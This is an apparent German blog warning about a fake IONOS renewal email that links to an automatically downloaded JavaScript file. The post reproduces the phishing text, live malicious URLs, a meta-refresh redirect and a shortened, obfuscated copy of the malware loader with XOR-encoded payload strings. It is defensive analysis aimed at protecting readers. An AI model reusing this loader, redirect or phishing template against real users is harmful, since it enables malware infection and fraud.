Es sind wieder einmal gefälschte IONOS-Mails im Umlauf. Sollte sich in deinem Postfach eine E-Mail von IONOS mit dem Betreff “Ihre Domain und Hosting-Service(s) wurden automatisch verlängert!” landen und sich im Nachrichtentext dieser oder ein ähnlich lautender Text, wie “Herunterladen Rechnung V2024A810195.pdf” mit einem hinterlegten Link zu einem angeblichen PDF befinden, solltest du diese Nachricht sofort löschen und auf gar keinen Fall auf den in der Mail angegebenen Link klicken!
Der angegebene Link führt dich nicht zu einer Rechnung in Form eines PDF, sondern zu einer malwarebehafteten URL. Nach dem laden der URL wird ohne dein Zutun automatisch eine JavaScript-Datei (Malware) auf dein Smartphone, dein Tablet oder deinen PC heruntergeladen.
Der Code der JavaScript der Datei ist verschleiert (obfuscated), so dass auf den ersten Blick nicht erkennbar ist, welchen Schaden diese Datei auf einem Gerät anrichten kann. In meinem Beitrag “Was ist JavaScript Obfuscation bzw. JavaScript-Verschleierung?” erkläre ich diese Technik der Verschleierung ausführlich.
Bei dieser gefälschten IONOS-Mail haben sich die kriminellen Urheber in Punkto Design keine besonders große Mühe gegeben, um Ihre Opfer zu täuschen. Die Nachricht kommt sehr textlastig, ohne ein nachgeahmtes Corporate Design von IONOS daher.
In den vergangenen Tagen sind bei uns noch weitere gefälschte IONOS-Mails eingetroffen, die nicht so leicht als Scam-Mails zu identifizieren sind, wie die nachfolgende Mail:
Von: IONOS <info@irgendeinedomain.de>
Betreff: Ihre Domain und Hosting-Service(s) wurden automatisch verlängert!
Nachrichtentext:
Sehr geehrter Kunde,
Ihre Domain example.com und Hosting-Service(s) wurden automatisch für den Betrag von €82,88 verlängert.
Hosting-Paket: Stellar
Abrechnungszeitraum – 1 Jahr: €82,88
Domain: example.com
Rechnungsnummer: V2024A810195
Bestellnummer: 10001995:28899a8e317d4028738c5ab322c9b
Herunterladen Sie die Rechnung, um alle von uns angebotenen Hosting-Dienste anzuzeigen.
Herunterladen Rechnung V2024A810195.pdf
Mit freundlichen Grüßen
Ihr Ionos Team
Der im Nachrichtentext hinterlegte Link
"Herunterladen Rechnung V2024A810195.pdf" führt zu der nachfolgenden URL:
https://rechnung-ionnos.thaiboxchile.cl/rechnung/
Auf dieser Website ist im Source-Code eine automatische Weiterleitung
zu der URL "https://file-download.importadorachr.cl/rechnung/" hinterlegt:
<html><head><meta http-equiv="Refresh" content="0; URL=https://file-download.importadorachr.cl/rechnung/" ></head></html>
Nachdem die URL im Browser geladen wurde, wird automatisch das nachfolgende
JavaScript als Datei auf das Gerät des Opfers heruntergeladen.
Der Code wurde von mir gekürzt:
...
function elections(crocotan, boccadelanoche) {
var trouters = onionsoup();
return elections = function (Boccadelanoche, Crocotan) {
Boccadelanoche = Boccadelanoche - (-0x22f6 + 0x160 + 0x207 * 0x11);
var Trouters = trouters[Boccadelanoche];
if (elections['SSslUm'] === undefined) {
var Elections = function (eLections) {
var cRocotan = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
var CRocotan = '', BOccadelanoche = '';
for (var ONionsoup = -0x4d * 0x67 + 0x1e27 + 0xd4, TRouters, ELections, onIonsoup = -0x238d * 0x1 + 0xf70 + 0x10f * 0x13; ELections = eLections['charAt'](onIonsoup++); ~ELections && (TRouters = ONionsoup % (-0x2705 + -0x1 * -0x1d86 + 0x983) ? TRouters * (0x67e * 0x2 + 0x16 * -0x171 + 0x12fa) + ELections : ELections, ONionsoup++ % (-0x16f * -0x2 + 0x221d + -0x24f7)) ? CRocotan += String['fromCharCode'](0x73 * -0x44 + -0x14dd + -0x2b * -0x138 & TRouters >> (-(-0x1d7b * -0x1 + -0xf40 + -0xe39 * 0x1) * ONionsoup & 0x1018 + 0x19cc + 0x1 * -0x29de)) : 0x20f2 * -0x1 + 0x39f + 0x1d53 * 0x1) {
ELections = cRocotan['indexOf'](ELections);
}
for (var trOuters = 0x856 + 0x347 * 0x6 + -0x1c00, boCcadelanoche = CRocotan['length']; trOuters < boCcadelanoche; trOuters++) {
BOccadelanoche += '%' + ('00' + CRocotan['charCodeAt'](trOuters)['toString'](0xd * 0x56 + -0x1ecb + 0x1a7d))['slice'](-(0x91b + -0xe86 + -0x3 * -0x1cf));
}
return decodeURIComponent(BOccadelanoche);
};
var tRouters = function (elEctions, crOcotan) {
var CrOcotan = [], OnIonsoup = 0x1a42 + -0x177a + -0x2c8, BoCcadelanoche, ElEctions = '';
elEctions = Elections(elEctions);
var TrOuters;
for (TrOuters = -0x2 * -0x64 + -0x105 * 0x3 + 0x247 * 0x1; TrOuters < -0x1 * -0x74f + 0xf65 + -0x15b4; TrOuters++) {
CrOcotan[TrOuters] = TrOuters;
}
for (TrOuters = -0x1df6 + 0x81e + -0x18 * -0xe9; TrOuters < 0x1284 + -0x2 * -0xb92 + 0x4 * -0xa2a; TrOuters++) {
OnIonsoup = (OnIonsoup + CrOcotan[TrOuters] + crOcotan['charCodeAt'](TrOuters % crOcotan['length'])) % (-0x11eb + 0xd1a * -0x2 + 0x2d1f), BoCcadelanoche = CrOcotan[TrOuters], CrOcotan[TrOuters] = CrOcotan[OnIonsoup], CrOcotan[OnIonsoup] = BoCcadelanoche;
}
TrOuters = -0xb3 * 0xe + 0x2 * -0x79a + -0x1 * -0x18fe, OnIonsoup = -0x1542 + -0xf9f + 0x24e1;
for (var bOCcadelanoche = 0x1fff + -0x132f + -0xcd0; bOCcadelanoche < elEctions['length']; bOCcadelanoche++) {
TrOuters = (TrOuters + (0x163a * -0x1 + 0x58e + -0x10ad * -0x1)) % (0x4d * 0xa + -0x11 * -0x1a9 + -0x1e3b), OnIonsoup = (OnIonsoup + CrOcotan[TrOuters]) % (0x1eba + -0x1504 + 0x1be * -0x5), BoCcadelanoche = CrOcotan[TrOuters], CrOcotan[TrOuters] = CrOcotan[OnIonsoup], CrOcotan[OnIonsoup] = BoCcadelanoche, ElEctions += String['fromCharCode'](elEctions['charCodeAt'](bOCcadelanoche) ^ CrOcotan[(CrOcotan[TrOuters] + CrOcotan[OnIonsoup]) % (-0x5 * -0x4ab + 0x661 * -0x4 + 0x32d)]);
}
return ElEctions;
};
elections['pyCSPj'] = tRouters, crocotan = arguments, elections['SSslUm'] = !![];
}
var Onionsoup = trouters[-0x22d1 * 0x1 + -0xf4a + 0x65 * 0x7f], oNionsoup = Boccadelanoche + Onionsoup, bOccadelanoche = crocotan[oNionsoup];
return !bOccadelanoche ? (elections['OuJVyc'] === undefined && (elections['OuJVyc'] = !![]), Trouters = elections['pyCSPj'](Trouters, Crocotan), crocotan[oNionsoup] = Trouters) : Trouters = bOccadelanoche, Trouters;
}, elections(crocotan, boccadelanoche);
}
function onionsoup() {
var oNionsoup = [
'WQtdKCoraSkLFSo3cNShiHNcTxddRSkxWRldOI1FW4ldMXHda1xcLdlcI3rLvmoz',
'ASkQW5HiW6uvlCk/gwZdSZyOW4C',
'W4BdSwhcKSk8ggRdNYjtvZtcJaK',
'h8ouWOddNW'
];
onionsoup = function () {
return oNionsoup;
};
return onionsoup();
}
function crocotan(boccadelanoche, trouters, Elections, Crocotan, Onionsoup) {
var Boccadelanoche = { Trouters: '0x3e7' };
return elections(Onionsoup - -Boccadelanoche.Trouters, boccadelanoche);
}
function ZHAMPTONforeignundertheFALKLAND(Zkingdomsthemakethanspiritedjudgment) {
if (typeof Zkingdomsthemakethanspiritedjudgment !== 'string') {
throw new Error('check input');
}
if (Zkingdomsthemakethanspiritedjudgment.length % 2 !== 0) {
throw new Error('printing');
}
var Zhaspopularbutthanhistorysuchanother = [];
for (var ZChurchherBIRTHsuch = 0; ZChurchherBIRTHsuch < Zkingdomsthemakethanspiritedjudgment.length; ZChurchherBIRTHsuch += 2) {
var ZMELVILLEthandisesteemed_?lite_ = Zkingdomsthemakethanspiritedjudgment.substr(ZChurchherBIRTHsuch, 2);
var ZhasdrewMessrsconcernDINGINGScotNothing = 0;
for (var j = 0; j < ZMELVILLEthandisesteemed_?lite_.length; j++) {
ZhasdrewMessrsconcernDINGINGScotNothing <<= 4;
var ZareclaimsboundChurchfrom = ZMELVILLEthandisesteemed_?lite_.charAt(j);
if (ZareclaimsboundChurchfrom >= '0' && ZareclaimsboundChurchfrom <= '9') {
ZhasdrewMessrsconcernDINGINGScotNothing |= (ZareclaimsboundChurchfrom.charCodeAt(0) - '0'.charCodeAt(0));
} else if (ZareclaimsboundChurchfrom >= 'A' && ZareclaimsboundChurchfrom <= 'F') {
ZhasdrewMessrsconcernDINGINGScotNothing |= (ZareclaimsboundChurchfrom.charCodeAt(0) - 'A'.charCodeAt(0) + 10);
} else if (ZareclaimsboundChurchfrom >= 'a' && ZareclaimsboundChurchfrom <= 'f') {
ZhasdrewMessrsconcernDINGINGScotNothing |= (ZareclaimsboundChurchfrom.charCodeAt(0) - 'a'.charCodeAt(0) + 10);
} else {
throw new Error('document ready');
}
}
Zhaspopularbutthanhistorysuchanother.push(ZhasdrewMessrsconcernDINGINGScotNothing);
}
return Zhaspopularbutthanhistorysuchanother;
}
var ZLatinwastheprintingconcerningfollowsonce = ZHAMPTONforeignundertheFALKLAND('1B776D17443A5F3E120C0E202A1974761B1763595324121A4A120B58541F54111306144B6B14666F4137064C2624360C521C02197D040F531B03302B053D3D57442B5F062A766E035A0663796A09507F4A06786B00657B0B5940754348455B4D0A4E740C76585E4353547A6F785C74477D04464770430A4169727C66414D78486A0B7A5E4E544A186A6C02796D4557016A435841760175794E6505765577077B4251006276590B57764860400C4E44786571047D5664576B54610363546F767F60015B45446C475C5D044B794D5C7C0F585B6C6276142F3509100F295E1175597E23272C3F33406E7F330446423A061E5B5703147C79171306281E210A1B1D3F47670A122229101D352C345F353F035A5F2E3724162D3E706C1F2C480825101D0E2A370F49100B56682B0E282859213E1E22671E4A113B1412080509544E671D1C253134292D573212304140373E3525145F39382179675F4C035D342C5944047A18151909381B584526552C51592708234E75095002595876002546360F26053B20252D38114D735E14132B371553352968195616363625303D3C292A3C045267315B110348310B1A035F02240C2452432A1A1A13331832255D504D0B5C0B52672D33070503303E5300582A7D74241850421C550F1A5F1B1E0528441724206D637010201B08082E023E196D6B4F7E615C0B2731282B1F67756A70797F535055605C5951001163693C447B71311E360925686B1E211D231977094B211A091F201A245F1F6A');
var Zchapter_?lite_Presbyterianwhichmere = ZHAMPTONforeignundertheFALKLAND('7757496D374335496A6B6D54466B49516E654479684A776D67736731356C7461616367384B774247654D75354C534E6B31686E6B546834776B66474F67444E38314C326D444B4630633754555930624E66354158384948326875597071776A61397745395A6B6771637849574E6B58744532746B437A39734541455476614B715833566D766279345954344C41766F37586F6B784439594A7757355A664E35436E6238554F75386E45794C7334797354564836487A576E59654D305A66595A4C593269697755746D7137734F78704F376E6D455952784D51796A7A423369487159415543514B6742585461326F596B7A373277335542336B7152744D657273497A437A77554D72644643413858546D6139414541774E565848745638615468716B53436C697965764C53795242354E5770544E656E73566D71636F6C30734376665558455141324B66537A645A44574D6639534846444332366135464A33346351437671684A46706144385532324D6D4763463161347063526648304577426C59574D5753707057336E7143457339454E5339727844435657545A4242506B6F4357366770305562787437784F6D596967446D777854795655313938506E566F43434172766459583868344546504875343066376E793073696C4D7930564C4A5854754C6D727843704F78505A745045745044594959424F4C53494B526A686D577572766536484E44635259416C537A5648466B5278413953673954696E7646714C337043');
var ZinteresthazardsstrugglesandPresbyterian = '';
for (var ZChurchherBIRTHsuch = 0; ZChurchherBIRTHsuch < ZLatinwastheprintingconcerningfollowsonce.length; ZChurchherBIRTHsuch++) {
ZinteresthazardsstrugglesandPresbyterian += String.fromCharCode(ZLatinwastheprintingconcerningfollowsonce[ZChurchherBIRTHsuch] ^ Zchapter_?lite_Presbyterianwhichmere[ZChurchherBIRTHsuch % Zchapter_?lite_Presbyterianwhichmere.length]);
}
var vrfindmshpwkjctq = [
crocotan('0!@&', -'0x308', -'0x304', -'0x305', -'0x306'),
crocotan('!i9a', -'0x307', -'0x305', -'0x307', -'0x305'),
crocotan('^5tZ', -'0x304', -'0x303', -'0x304', -'0x304'),
ZinteresthazardsstrugglesandPresbyterian,
crocotan('QkIF', -'0x305', -'0x301', -'0x302', -'0x303')
];